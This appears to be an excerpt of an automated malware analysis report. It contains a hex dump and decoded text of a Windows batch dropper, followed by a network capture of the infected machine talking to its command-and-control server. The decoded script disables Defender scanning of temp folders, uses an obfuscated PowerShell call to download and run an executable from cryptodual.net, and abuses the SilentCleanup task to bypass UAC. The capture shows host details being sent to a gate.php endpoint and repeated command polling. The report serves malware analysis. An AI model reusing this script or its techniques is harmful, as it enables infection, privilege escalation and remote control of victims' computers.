74 70 73 3a 2f 2f 63 72 79 70 74 6f 64 75 61 6c 2e 6e 65 74 2f 73 76 63 68 6f 73 74 2e 65 78 65 27 2c 28 24 65 6e 76 3a 74 65 6d 70 29 2b 27 5c 70 73 2e 65 78 65 27 29 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 32 3b 20 53 74 61 72 74 2d 50 72 6f 63 65 73 73 20 24 65 6e 76 3a 74 65 6d 70 5c 70 73 2e 65 78 65 3b 26 52 45 4d 20 22 20 3e 6e 75 6c 0d 0a 74 69 6d 65 6f 75 74 20 2f 74 20 32 20 3e 6e 75 6c 0d 0a 73 63 68 74 61 73 6b 73 20 2f 72 75 6e 20 2f 74 6e 20 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 44 69 73 6b 43 6c 65 61 6e 75 70 5c 53 69 6c 65 6e 74 43 6c 65 61 6e 75 70 20 2f 49 20 3e 6e 75 6c 0d 0a 74 69 6d 65 6f 75 74 20 2f 74 20 33 20 3e 6e 75 6c 0d 0a 72 65 67 20 64 65 6c 65 74 65 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 46 0d 0a 29 0d 0a 69 66 20 22 25 76 65 72 73 69 6f 6e 25 22 20 3d 3d 20 22 36 2e 33 22 20 28 20 65 63 68 6f 20 22 57 69 6e 64 6f 77 73 20 38 2e 31 20 64 65 74 65 63 74 65 64 22 20 0d 0a 72 65 67 20 61 64 64 20 22 48 4b 43 55 5c 45 6e 76 69 72 6f 6e 6d 65 6e 74 22 20 2f 76 20 22 77 69 6e 64 69 72 22 20 2f 64 20 22 63 6d 64 20 2f 63 20 73 74 61 72 74 20 70 5e 6f 77 65 72 73 68 5e 65 6c 5e 6c 20 2d 77 20 31 20 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 74 65 6d 70 22 20 3b 41 64 64 2d 4d 70 50 72 65 66 65 72 65 6e 63 65 20 2d 45 78 63 6c 75 73 69 6f 6e 50 61 74 68 20 22 24 65 6e 76 3a 61 70 70 64 61 74 61 22 20 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 31 32 3b 20 28 4e 65 77 2d 4f 62 6a 65 63 74 20 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 29 2e 44 6f 77 6e 6c 6f 61 64 46 69 6c 65 28 27 68 74 74 70 73 3a 2f 2f 63 72 79 70 74 6f 64 75 61 6c 2e 6e 65 74 2f 73 76 63 68 6f 73 74 2e 65 78 65 27 2c 28 24 65 6e 76 3a 74 65 6d 70 29 2b 27 5c 70 73 2e 65 78 65 27 29 3b 53 74 61 72 74 2d 53 6c 65 65 70 20 32 3b Data Ascii: mode 18,1color FEsetlocalfor /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%jif "%version%" == "10.0" ( echo "Windows 10 detected" reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2; Start-Process $env:temp\ps.exe;&REM " >nultimeout /t 2 >nulschtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I >nultimeout /t 3 >nulreg delete "HKCU\Environment" /v "windir" /F)if "%version%" == "6.3" ( echo "Windows 8.1 detected" reg add "HKCU\Environment" /v "windir" /d "cmd /c start p^owersh^el^l -w 1 Add-MpPreference -ExclusionPath "$env:temp" ;Add-MpPreference -ExclusionPath "$env:appdata" ;Start-Sleep 12; (New-Object Net.WebClient).DownloadFile('https://cryptodual.net/svchost.exe',($env:temp)+'\ps.exe');Start-Sleep 2;

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49171	172.67.167.122	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Jan 4, 2021 19:16:01.877512932 CET	1285	OUT	POST /cc/gate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: http generic Host: cryptodual.net Content-Length: 87 Cache-Control: no-cache Data Raw: 48 57 49 44 3d 7b 38 34 36 65 65 33 34 30 2d 37 30 33 39 2d 31 31 64 65 2d 39 64 32 30 2d 38 30 36 65 36 66 36 65 36 39 36 33 7d 26 6e 61 6d 65 3d 41 6c 62 75 73 2f 30 36 31 35 34 34 26 6f 73 3d 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e 61 6c Data Ascii: HWID={846ee340-7039-11de-9d20-806e6f6e6963}&name=user/061544&os=Windows 7 Professional
Jan 4, 2021 19:16:02.812693119 CET	1286	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Set-Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161; expires=Wed, 03-Feb-21 18:16:01 GMT; path=/; domain=.cryptodual.net; HttpOnly; SameSite=Lax X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770360e7b0000d6d92a8f0000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=9owAiYaRznDgpbgcTeFGU%2BexJ0xaDm%2FJssTXoDRgbp59jmLzUQ6YrhQY36Skv2jZGO4qHDbmuE6C7y%2Bz4JZ%2BGH0TDoiVQ5rFfoALvrk%2Fug%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f2c3ffd4d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:02.870225906 CET	1287	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:03.162255049 CET	1287	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077036125e0000d6d93d35d000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=B9r908AHLAjv%2BajjajS0gl0%2FjH38CJa%2B63pjZnYx237rcr%2B26I8fvAzPTZoCT%2BrJkaqHvtzUzu5JZo9MgWqedIw1%2F%2FstbBCqmNBGx6%2BKFQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f2ca3dcad6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:03.164614916 CET	1288	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:03.547535896 CET	1288	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703613920000d6d9fbb97000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Q9EMkYjT1GpIlgBBSuXZtwe%2F0Bvhu5442NgrgBeYoeCnEJe3Ifq7FuZDIFYyz%2FXNagqtYp4ffdVzf%2FfGhvBeutgZgslLc6zW3pNlTpJpog%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f2cc0a70d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:03.550128937 CET	1289	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:03.685976982 CET	1289	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 077036150a0000d6d940987000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2BpNL0RsNrvfKOucakf2Ma32aSQOl%2BLefh2E0n%2BXmX1bYuNuuJEJp9x0W4zS5DjMGcVSoez00X7AtJ%2Bq4uxw6D4T%2FV2y69SRuknjYExyU%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f2ce6f9dd6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:03.695874929 CET	1290	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:03.775778055 CET	1290	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703615950000d6d9618ee000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=6u3PLa86bkZkmixVT6Um%2FGUTPYdIG2KHIPbUk%2F4inJFsXMAsS%2BvZcdOZQoi0yuJdWijKK8vjr9h%2Br4lxADo6G9iLn3o1cUX0%2BGYvrjWdQg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f2cf599ed6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:08.788014889 CET	1291	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:08.878509045 CET	1292	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703629790000d6d9640c3000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ENJ8wRbMogDfKRp1aECL90MnUBkGOP6BpdDKUXqMz%2BSlAKFhWFjQhF%2BDk%2BBliXv04RNhfkqmdN5M0CwkEyla%2BtXeEF4bY3Hgp2rm4Hs8oA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f2ef2942d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:08.880536079 CET	1292	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:08.966378927 CET	1293	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703629d50000d6d9281d9000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=3M7BA5XhVtxC2Q%2B1dK1unJcBi3d%2F8U4mpwhBadFqbCHOiKEHl2%2Bqo%2B2N%2FKz6uuinhSycpKrfgJeU3ytClUMn9EWqFsE2d711kPFcaxHAtw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f2efba8fd6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:08.968307972 CET	1293	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:09.064079046 CET	1294	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770362a2d0000d6d923811000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Odjukxx6Q4FXoSpj4pmqYtcdQ%2FVI9GdcsPqBhHIOXQN5lmbyFC4i%2BHr15j25hGjUJwmHnj3%2Byni5dlWHs58e%2Fc5y7UK%2FFDxm4zTe%2FDiETw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f2f04bc2d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:09.066073895 CET	1294	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:09.148210049 CET	1295	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770362a8f0000d6d96f09d000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=%2B1CfGJlUs7ozYB7z1doE6fcSK3v96tYdjCH4s4XSwMOwzB98j6oOrVlBTaSVdX2gsc5FDTpaGIMu8cb%2BGGv%2FaCEqI8LEIa7ppVpZhtmcPg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f2f0ed2fd6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:14.156342983 CET	1295	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:14.240035057 CET	1296	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770363e710000d6d961858000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=OglaMpq6sB3wo567jFNXxdnKx2upihd5VhO7IKBae18k5Z4STSCmYA6HBWnVSWaHtTpJpXQUyTStN%2BAe%2FG0UncpgXFkUoxpu2aZ6ojOK4g%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f310b80ad6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:14.243232012 CET	1296	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:14.371928930 CET	1297	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770363ec90000d6d90dafa000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=jqIUgOK5vcYG9ND1o7OzzKKJAvaMIqkow56foLpPZu5uOfArxHlcGSPRErDPl1mE3uZvfDzhGiN86N9rLujh%2B66kWaKHFQ8%2F83N5lpzwFA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f3114923d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:14.373823881 CET	1297	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:14.460578918 CET	1298	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770363f4b0000d6d95293e000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=UwW1Wa9DPHYgibxE4gaRyRDY576ouUaMyvCLl%2BzNe0lF2hsYCXFSfeiMoZFT2jmRWhkdgjf4n23qqSRq8m2TeAV1XRPhAFiIDsy%2FPlqyiA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f3121ab6d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:14.464342117 CET	1298	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:14.558474064 CET	1299	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770363fa50000d6d961870000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=9al1H%2F3Mk81HqKrYnvduAki3GrJdU0tTP%2BSBdPJkMW7H7qdD06uoa1YqiuKfXcgZUSFMB2b2wFkNj11g%2FgzXGtQUvi2Jx0UagfKuh9K0sQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f312abfbd6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:20.188842058 CET	1299	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:20.510296106 CET	1300	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703656020000d6d966a4e000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Ya%2FEV7MXFKyKmhj5OY55zHft4syV%2Fs7YU0nwGEytESTOWTmWOKCCTS13mIFnC9cHIEqQjlU6a%2FuFHx9%2FLjquYIF%2BnVBF7FTlmTL1k17fQw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f3366f88d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:20.525207996 CET	1300	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:20.602121115 CET	1301	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703657530000d6d96408d000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=LGmdpO1R5ZCPkBZZ6eLPFDpXl00nIkfQf0ZXWcWd6kW2BTDgnQ7hDPPDI8TsBo2zU9nIKcPF81BYNOi0zRL%2BGVrB3W9KK44bd4pm3kNCCg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f3388bb1d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:20.604695082 CET	1301	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:20.693628073 CET	1302	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703657a20000d6d97185f000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=r0boyIAtNi1YStAI%2BaGhmPNdvrC3JoULl3AA3%2FNqiSj5CQKHuvyy2hf2MqIY4CZrdLpHa1MuhYy2WwDBRmm5WsU6A0H7Ah3K5Aas7YCrng%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f3390cb7d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:20.695406914 CET	1302	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:20.820446014 CET	1303	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 07703657fc0000d6d9fb3ae000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=UtIv0OIg1BQlpv4tDY8FTzrDTyf9rriGqIt4w6ufUgZwYYQINj5f7goEh3a4pYunghbTL08cSJ0cCC64kju0pl4%2Ff%2Fjpd9OHofaZNnp70Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f3399ddfd6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:25.821773052 CET	1303	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:25.934205055 CET	1304	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770366c150000d6d920a8f000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=TZl3Hpj%2F3VRrWgrynTPfHlsuU0Et2dEYHyvxsq3em%2FtLiEH7YXtE8sJgleR8TB6H1tKbdEeBhf8JX0TM55a6wLi6dEfRkdoPvFNsre4whg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f359a930d6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:25.936414003 CET	1304	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:26.041019917 CET	1305	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770366c760000d6d94639f000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=vFirehTi980MOXcrj54sMiQUSgTIILS40ZNBZeZZOMKwHIjJjnIUDHwC5pjMl%2Fut5%2BgqJOjgFGDeFgxvBh87rSmXyvDGz%2FPj2qfVndJ73A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f35a5a9ad6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:26.045707941 CET	1305	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
Jan 4, 2021 19:16:26.126383066 CET	1306	IN	HTTP/1.1 200 OK Date: Mon, 04 Jan 2021 18:16:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.0.33 X-Turbo-Charged-By: LiteSpeed CF-Cache-Status: DYNAMIC cf-request-id: 0770366ce30000d6d940906000000001 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=KkW%2Bs%2BWmKfNpgOYQeJITpb1CYpCQYF6DTkKnOy9R3f8VzENtLJhnAk7aGCK0sLIx%2BfG30jQS6BtXO5kGJocOJKktm2CYWIhJepH3lhz4MQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 60c6f35b0befd6d9-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Jan 4, 2021 19:16:26.128197908 CET	1306	OUT	GET /cc/inc/check_command.php?HWID={846ee340-7039-11de-9d20-806e6f6e6963}&act=get_command HTTP/1.1 User-Agent: MyAgent Host: cryptodual.net Cache-Control: no-cache Cookie: __cfduid=d06f53df8ac0389b20d19542af55205061609784161
